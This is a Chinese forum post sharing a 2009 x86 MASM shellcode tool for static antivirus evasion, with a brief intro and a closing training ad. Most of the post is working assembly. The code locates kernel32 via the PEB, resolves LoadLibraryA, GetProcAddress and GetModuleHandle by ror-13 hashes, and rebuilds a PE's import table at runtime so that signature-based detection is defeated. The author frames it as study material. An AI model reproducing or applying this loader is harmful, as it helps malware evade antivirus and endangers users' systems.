好久没来这逛了,放个09年写的小工具。
其实静态免杀主要涉及特征定位,PE文件格式。loader机制,PE变形技术,掌握上面这些基础之后可以说基于特征定位的查杀基本就沦为鸡肋。09年研究各杀软的静态检测能力时,写了这个小工具。现在放出来给有需要的同学一起学习,交流,望勿用于其它用途。
shellcode功能(当时只在xp上测试):
动态加载PE文件导入表中的所有函数:
目前导入地址为正常导入地址,其中,程序只需要4字节定位导入表的位置,
因此可任意存放原导入表RVA
.386
.model flat,stdcall
option casemap:none
include windows.inc
.code
start:
assume fs:nothing
mov edx,dword ptr fs:[30h]
mov eax,dword ptr[edx+0Ch]
mov esi,dword ptr[eax+1Ch]
lods dword ptr[esi]
mov edi,dword ptr[eax+8] ;已经取得kernel32.dll基地址
push ebp
mov ebp,esp
sub esp,200h
mov dword ptr [ebp - 04], edi
push 0EC0E4E8Eh
push dword ptr [ebp - 04]
call GetApiAddress
mov dword ptr [ebp- 08], eax ;LoadLibraryA ebp-08
push 7C0DFCAAh
push dword ptr [ebp - 04]
call GetApiAddress
mov dword ptr [ebp - 0ch], eax ;GetProcAddress ebp -0c
push 0D3324904h
push dword ptr [ebp - 04]
call GetApiAddress
mov dword ptr [ebp -10h], eax ;GetMoudleHandle ebp-10
push NULL
call dword ptr [ebp -10h]
mov dword ptr [ebp-14h], eax ;hMoudle send ebp -14
pushad
mov esi,dword ptr [ebp -14h]
add esi,dword ptr [esi + 3ch]
assume esi:ptr IMAGE_NT_HEADERS
mov esi,[esi].OptionalHeader.DataDirectory[8].VirtualAddress
add esi,dword ptr [ebp -14h]
assume esi:ptr IMAGE_IMPORT_DESCRIPTOR
.while [esi].OriginalFirstThunk || [esi].TimeDateStamp || [esi].ForwarderChain \
[esi].Name1 || [esi].FirstThunk
.if [esi].OriginalFirstThunk
mov ebx,[esi].OriginalFirstThunk
add ebx,dword ptr [ebp -14h]
mov edi,[esi].Name1
add edi,dword ptr [ebp -14h]
push edi
call dword ptr [ebp -08]
mov edi,eax ;edi为Import对应的dll模块句柄
mov edx,[esi].FirstThunk
add edx,dword ptr [ebp -14h]
.else
mov ebx,[esi].FirstThunk
add ebx,dword ptr [ebp -14h] ;定位firstThunk数组
mov edi,[esi].Name1
add edi,dword ptr [ebp -14h]
push edi
call dword ptr [ebp -08h]
mov edi,eax ;edi为Import对应的dll模块句柄
mov edx,[esi].FirstThunk
add edx,dword ptr [ebp -14h]
.endif
.while dword ptr [ebx]
.if dword ptr [ebx] & IMAGE_ORDINAL_FLAG32 ;按序号导入
push edx
mov eax,dword ptr [ebx]
and eax,0FFFFh
push eax
push edi
call dword ptr [ebp -0ch]
pop edx
mov dword ptr [edx],eax
.else
mov eax,dword ptr [ebx]
add eax,dword ptr [ebp -14h]
push edx
assume eax:ptr IMAGE_IMPORT_BY_NAME
add eax,2
push eax
push edi
call dword ptr [ebp -0ch]
pop edx
mov dword ptr [edx],eax
.endif
add ebx,4
add edx,4
.endw
add esi,sizeof IMAGE_IMPORT_DESCRIPTOR
.endw
popad
add esp ,200
leave
GetApiAddress proc KernelBaseAddress:dword, EncryptNum:dword
LOCAL ReturnValue:dword
pushad
mov edi,KernelBaseAddress
mov eax,dword ptr[edi+3ch]
mov edx,dword ptr[edi+eax+78h] ;IMAGE_EXPORT_DIRECTORY
add edx,edi
mov ecx,dword ptr[edx+18h] ;名称导出的函数总数
mov ebx,dword ptr[edx+20h] ;函数名地址表
add ebx,edi
push edx ;保存edx
NotFound:
jecxz ExitGetApi
dec ecx
mov esi,dword ptr[ebx+ecx*4] ;从最后一个函数名开始查找 Address of names
add esi,edi
xor eax,eax
cdq
LoopChar:
lods byte ptr[esi]
test al,al
je CharEnd
ror edx,0dh ;对字符串进行hash运算
add edx,eax
jmp LoopChar
CharEnd:
cmp edx,EncryptNum
jnz NotFound
pop edx ; 恢复edx
mov ebx,dword ptr[edx+24h] ; 函数序号表 Address of name ordinals
add ebx,edi
mov cx,word ptr[ebx+ecx*2] ; 找到了函数的序号
mov ebx,dword ptr[edx+1ch] ; 函数地址表
add ebx,edi
add edi,dword ptr[ebx+ecx*4] ;由序号得出函数的rva
mov ReturnValue,edi
ExitGetApi:
popad
mov eax,ReturnValue
ret
GetApiAddress endp
end start
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课